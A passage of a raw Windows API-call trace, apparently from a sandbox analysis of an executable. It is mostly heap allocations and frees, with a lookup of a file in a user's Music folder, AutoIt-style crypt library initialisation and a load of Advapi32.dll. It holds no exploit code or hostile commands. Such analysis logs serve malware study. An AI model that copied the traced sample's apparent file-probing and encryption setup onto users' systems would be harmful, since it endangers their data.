returned 0x43ca190 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0113.527] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.530] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524dd610, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x867c25b0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x867c25b0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="fKGiw.wav", cAlternateFileName="")) returned 0x41ac200 [0113.530] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.531] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0113.531] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0113.531] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0113.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.531] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0113.532] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.532] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0113.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0113.532] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0113.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0113.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.533] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0113.574] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0113.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0113.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0113.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0113.575] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.575] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0113.575] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.576] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0113.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0113.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0113.577] PeekMessageW (in: lpMsg=0x144e584, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e584) returned 0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0113.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0113.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0113.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: 